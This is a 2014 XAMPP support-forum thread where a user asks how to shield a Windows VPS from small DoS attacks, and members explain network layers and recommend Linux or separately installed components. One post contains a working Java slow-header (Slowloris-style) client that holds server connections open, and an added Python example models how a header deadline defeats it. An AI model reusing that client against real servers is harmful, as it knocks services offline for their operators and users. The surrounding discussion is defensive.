Protection for Dos and simple DDos attacks on Windows?

Posted: 12. February 2014 19:30
by Shackles
Hi, I know with just a script or mod I ain't going to stop a well done DDoS attack. But there are ways to stop DoS attacks and small DDoS attacks.

I tried on my server a small DOS attack (just from one IP), it shut it down in 10 seconds for about 5 minutes. I need to be protected at least from this.


My server info:
Managed VPS (I have admin access, and free to install anything)
Windows Server 2008
2048 MB RAM
1.000 Mbps connection.


Thanks.

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 12. February 2014 20:27
by JJ_Tagy
This is beyond the scope of XAMPP. Your best bet is to look for hardware or other options.

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 12. February 2014 21:22
by Nobbie
As JJ_Tagy already pointed out, this is beyond the scope of Xampp.

I only want to clear it up more precisely:

A protection of DDOS attack is not a question of a(ny) Webserver, this is quite simply not the right "layer" for this kind of attack. IP and TCPIP is divided in several layers, the layer of a Webserver is by far too late. If your server really suffers from a DDOS attack, you have to answer this in the HIGHEST as possible layer of TCPIP, as a DDOS is independent from underlying protocols (like HTTP or FTP or similar).

It is at least a task of a local firewall and even in that case I have some bad news: a real real real DDOS attack is a pain and cannot be avoided, in the worst case there is no other solution than using a different IP for the attacked server. On the other hand, such hard DDOS attacks usually attack famous servers, because there is no sense to attack a small private server with thousands and millions of (private) PCs. Even if this is possible - there is no sense in attacking small private servers.

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 12. February 2014 21:35
by Shackles
By multi-layering do you mean:

DOMAIN NAME PROVIDER --> SERVER 1 --dns rule to --> SERVER 2 -- dns rule to --> SERVER 3 (real host)

In that case, even with a "PING DOMAIN NAME", would give me back IP server3 real host.

My idea is to stop a DOS attack at least, how would I start with that?

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 01:24
by Altrea
Hi,

[INFO] How to not fail getting help here::Scope of support
DDos Attacks are not a problem for local test or development environments.

Everything else is said. It is not possible to prevent DDos attacks completely, you can only minimize the negative effects e.g. by load balancing between many many many servers and CDNs or by changing the request parameters (urls, ips). If you are interested in DDoS prevention ask a specialist. There are companies which are specialized in preventing attacks.

best wishes,
Altrea

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 02:09
by Shackles
And for a simple DOS attack would mod_evasive and mod_security work?

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 02:25
by Altrea
That depends on the attack. At the end preventing attacks is very inefficient if they have reached the webserver, so Apache modules are very inefficient too.
You will only be able to lower processing resources a bit, nothing more.

But if you are using XAMPP in public accessible environments preventing DoS attacks would be your smallest problem.

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 10:41
by Shackles
Excuse me for my ignorance on this part. But I have searched over the net for disadvantages of using XAMPP in a public scope, but I find no problems.

I have deleted everything unneeded, just leaving Apache, PHP & MySQL.
And in the config I have removed quite a bit of XAMPP's configuration.

What is so bad about using XAMPP in a public scope?

And back to my original question, so really nowadays, it's not even worth having mod_evasive or mod_security installed?

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 12:53
by Nobbie
Shackles wrote: By multi-layering do you mean:

No. I mean the TCPIP layers resp. in an HTTP environment. I cannot explain this in a few words, but HTTP is a sophistic protocol which is "pulled" over TCPIP and a DDOS attack does not (only) happen on HTTP level, but on TCPIP level.

Think of HTTP as car you wanna drive and TCPIP is the road you wanna use. What does it help to protect your car, if the road is destroyed?

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 14:06
by Altrea
Shackles wrote: What is so bad about using XAMPP in a public scope?

XAMPP is configured for a specific purpose. That means it is not tweaked for performance, scalability, stability or security.
XAMPP components are coupled / integrated into each other so you cannot easily upgrade a single component of it to fix security holes.

If you have the knowledge to secure every single component feel free to do so.
But don't create any thread here that your XAMPP is hacked and how to fix that (internet is full of such posts).
We simply don't support XAMPP in such environments.

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 14:13
by Shackles
Yes I get what you mean, even if I have software installed, if I have a strong MBps attack it will destroy the connection without even having to ask a firewall on my server.

Most servers aren't protected against DDOS attacks due to that it is expensive. But there must be something like mod_evasive to stop a VERY VERY SMALL attack from a kid for instance.

My main issue right now is that I can run (I have done it) this Java script:
Code:
      Date localDate = new Date();
      long l = localDate.getTime();

      String str = "GET / HTTP/1.1\r\nHost: " + this.ip + "\r\n";
      str = str + "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
      str = str + "Content-Length: " + (int)(Math.random() * 1000.0D) + "\r\n";
      str = str + "X-a: " + (int)(Math.random() * 1000.0D) + "\r\n";

      Socket localSocket = new Socket(this.ip, this.port);
      BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localSocket.getInputStream()));
      BufferedWriter localBufferedWriter = new BufferedWriter(new OutputStreamWriter(localSocket.getOutputStream()));
      localBufferedWriter.write(str);
      localBufferedWriter.flush();

      while ((localSocket.isConnected()) && (this.timeLeft > 0))
      {
        System.out.print(".");
        localDate = new Date();
        this.timeLeft = ((int)(this.timeLeft - (localDate.getTime() - l)));

        localBufferedWriter.write("X-c:" + (int)(Math.random() * 1000.0D) + "\r\n");
        localBufferedWriter.flush();
        Thread.sleep((int)(Math.random() * 15000.0D));
      }

For 2 seconds at my IP:PORT (my connection isn't great), and it tears up my server...


@altrea:

What do you recommend me on a windows server? IIS7?
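
Added example, not part of the original thread and not Apache's own code: a simplified Python model of why a per-read idle timeout never fires for the slow-header client posted above, while a total header deadline with a minimum data rate (the semantics of Apache mod_reqtimeout's `RequestReadTimeout header=20-40,MinRate=500`) cuts it off. The arrival timelines and the 300 s idle value are constructed assumptions.

```python
# Simplified model of two server-side timeout policies (added example).
# Each event is (arrival_time_s, nbytes, headers_complete).

def idle_timeout(events, idle_s):
    """Per-read idle timeout: drop only if no bytes arrive for idle_s seconds."""
    last = 0.0
    for t, _nbytes, complete in events:
        if t - last > idle_s:
            return ("dropped", last + idle_s)
        if complete:
            return ("complete", t)
        last = t
    return ("open", last)  # trace ended with the worker slot still occupied


def header_deadline(events, initial_s, max_s, min_rate):
    """Total deadline for the header block: initial_s, extended by one second
    per min_rate bytes received, never beyond max_s."""
    received = 0
    for t, nbytes, complete in events:
        deadline = min(initial_s + received / min_rate, max_s)
        if t > deadline:
            return ("dropped", deadline)
        received += nbytes
        if complete:
            return ("complete", t)
    return ("open", events[-1][0])


# Constructed timelines (not captured traffic).
BROWSER = [(0.05, 420, True)]
# Shape of the client in the post: one partial header block, then a ~10-byte
# header line every 7.5 s (mean of its 0-15 s sleep), never the final blank line.
SLOW = [(0.0, 200, False)] + [(7.5 * k, 10, False) for k in range(1, 17)]
# A client that pads with 500 bytes/s to satisfy the minimum rate.
PADDED = [(float(k), 500, False) for k in range(60)]


def compare(idle_s=300, initial_s=20, max_s=40, min_rate=500):
    """Return {trace: (idle-timeout verdict, header-deadline verdict)}."""
    traces = {"browser": BROWSER, "slow": SLOW, "padded": PADDED}
    return {name: (idle_timeout(ev, idle_s),
                   header_deadline(ev, initial_s, max_s, min_rate))
            for name, ev in traces.items()}


if __name__ == "__main__":
    for name, verdicts in compare().items():
        print(name, verdicts)
```

In the model the slow client is dropped about 20 s in and the padding client at the 40 s cap, while under the idle timeout both still hold a worker when the trace ends.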

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 14:28
by Nobbie
Shackles wrote: What do you recommend me on a windows server? IIS7?

Still Apache etc. - but not installed via Xampp, instead install Apache, PHP and MySQL separately. This gives you free maintenance and you may upgrade each component as you like.

One last word: I do not recommend Windows for that, I recommend Linux. All these tools are developed under Linux, they are well maintained under Linux, most WWW Servers are running a Linux (or BSD) Server and it gives you the opportunity to easily install from source code (if you need special modules etc.), as usually you may install the development environments for Apache etc. as well. And Linux (or BSD) are free and they run very stable.

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 15:23
by Altrea
Shackles wrote: @altrea:

What do you recommend me on a windows server? IIS7?

I totally agree with Nobbie's last post.
If you want to administrate your own Webserver you should have the knowledge how all of these components fit together (and installation and integration of these components is very easy on many Linux distributions with help of their package managers).

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 16:32
by Shackles
I agree with you too, for Apache Linux systems are way better. But right now I need a Windows server, mainly because I don't want to be running 2 servers (One Windows Server for the game server, and One Linux Server for the WebServer), for a smooth run of both features.

So you recommend me to install Apache, PHP, MySQL separately. And this way if any security holes are patched, I can update easier.

A simple question about the DDoS again.
I don't want to have to keep moving servers, so is this possible:

-Keep my Windows VPS (Love its Speed, for the game server and webserver), with no DDOS detection.
-Contract a Linux VPS, to use as a Firewall for my Windows VPS.

Would that work for simple attacks?

Re: Protection for Dos and simple DDos attacks on Windows?

Posted: 13. February 2014 16:55
by Altrea
From your point of view: define "simple attacks"
We don't know anything about how you will implement the firewall and which type of firewall.
The answer is as always: it depends